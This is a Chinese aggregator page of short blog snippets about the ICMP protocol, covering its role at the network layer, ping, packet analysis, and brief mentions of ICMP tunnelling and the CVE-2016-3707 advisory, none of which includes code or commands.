网际控制报文协议 ICMP : 为了提高 IP 数据报交付成功的机会,在网际层使用了网际控制报文协议 ICMP (InternetControl Message Protocol)。 ICMP 允许主机或路由器报告差错情况和提供有关异常情况的报告。ICMP 不是高层协议,而是 IP 层的协议。ICMP 报文作为 IP 层数据报的数据,加上数据报的首部,组成 IP 数据报发送出去。ICMP 报文的格
vc++网络通讯例子.rar
03-29
这个"vc++网络通讯例子.rar"压缩包很可能是包含了一些使用VC++实现网络通信的示例代码,帮助开发者理解和学习如何在Windows环境下通过C++进行网络编程。 网络通信主要涉及到TCP/IP协议栈,这是互联网通信的基础。在...
icmp端口是什么
最新发布
05-22
综上所述,ICMP并不具备传统意义上所说的端口概念,因为它是独立运作于OSI模型第三层——即网络层之上的一套轻量级通讯框架体系。其核心价值体现在提供必要的诊断调试能力以及增强整体互联体验质量等方面[^7]。 ---
易语言测试与指定主机是否能够正常通讯
08-26
在本文中,我们将深入探讨易语言中的"通信测试命令",用于测试与指定主机的通讯是否正常。 易语言的通信测试命令,英文名为"ping",属于网络通信类别,其主要功能是检测程序能否成功地与目标主机建立连接,并获取...
【网络安全】ICMP隐蔽隧道通信与检测
Sun_study的博客
01-17 2177
在一些网络环境中,如果攻击者使用各类上层隧道(例如HTTP隧道,DNS隧道,正反向端口转发等)进行操作均失败。那么可以尝试使用ICMP建立隧道,ICMP协议不需要端口的开放,因为其基于IP工作的,所以我们将其归结到网络层,ICMP消息最为常见的就是ping命令的回复,将TCP/UDP数据包封装到ICMP的ping数据包中,从而穿过防火墙**(通常防火墙是不会屏蔽ping数据包的)**
ICMP协议实现ping的测试
要把所有那些负面的信息当做对自身行为的评价,而不是对自身价值的评判。
03-09 649
Internet Control Message Protocol
linux icmp漏洞,Linux kernel icmp_check_sysrq命令执行漏洞(CVE-2016-3707)
weixin_32413167的博客
05-16 177
Linux kernel icmp_check_sysrq命令执行漏洞(CVE-2016-3707)发布日期:2016-06-24更新日期:2016-06-28受影响系统:描述:CVE(CAN) ID: CVE-2016-3707Linux Kernel是Linux操作系统的内核。Linux Kernel kernel.org projects/rt补丁net/ipv4/icmp.c/icmp_c...
ICMP协议解析与实战
恐龙弟旺仔的博客
05-21 5023
1.ICMP协议概述 1.1 什么是ICMPICMP(Internet Control Message Protocol的缩写),中文就是:网际报文控制协议。 该协议是网络协议族的核心协议之一。通过一张图来看下该协议所处位置: (图片来自百度安全验证): 可以看到,ICMP协议与IP协议同属网络层。 虽然两者同属网络层,没有上下级关系,但是ICMP协议最终还是要依靠IP协议将报文发送出去。 1.2 ICMP协议作用 IP协议我们知道是发送数据包的重要协议,实现了数据包的分片发送.
ICMP实例分析
火焰
09-13 4595
发现:在承载ICMP的IP的报文中的协议字段的值是0x01   作为ping命令的原理,自己通过ping同一宿舍的电脑但是失败的报文的场景: ICMP询问报文中的回送请求或回答报文中的回送报文:   A B C D E F G H I J K
ICMP协议详解
热门推荐
honeyJ
05-30 20万+
ICMP协议详解 ICMP协议是一个网络层协议。 一个新搭建好的网络,往往需要先进行一个简单的测试,来验证网络是否畅通;但是IP协议并不提供可靠传输。如果丢包了,IP协议并不能通知传输层是否丢包以及丢包的原因。 所以我们就需要一种协议来完成这样的功能–ICMP协议。 ICMP协议的功能 ICMP协议的功能主要有: 1. 确认IP包是否成功到达目标地址 2. 通知在发送过程中IP包被...
ICMP数据包-实战分析
Koma的主页
07-13 1万+
昨天有位学习网络编程的兄弟对于TCP/IP里一些协议与概念性的东西很模糊,想让我给他讲解一下ICMP。这不正有空,于是乎随手抓了个ICMP的包给他分析了一下: (前面这些概念性的东西,这是基础的,必看!) ICMP报文包含在IP数据报中,属于IP的一个用户,IP头部就在ICMP报文的前面。所以一个ICMP报文包括IP头部、ICMP头部和ICMP报文(见图表,ICMP报文的结构和几种常见
网络通信基础:ICMP基础通识
HongDaYu的搬砖之路
08-25 3464
前面已经对基础的osi的网络通用模型进行了讲解 所以在知道了什么是OSI的7层网络模型之后,对ping的理解就会更加透彻一些 但是在讲ping包以前会对底层的协议包的组包方式进行了解,同时也算是对基础的一个巩固,做运维的同学会对ping非常熟悉,但是具体的ping你的ping具体是哪一层的通信,估计大家不是很了解。所以今天对此知识进行梳理(因为没梳理之前我也不知道,所以咱们推导一下) ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值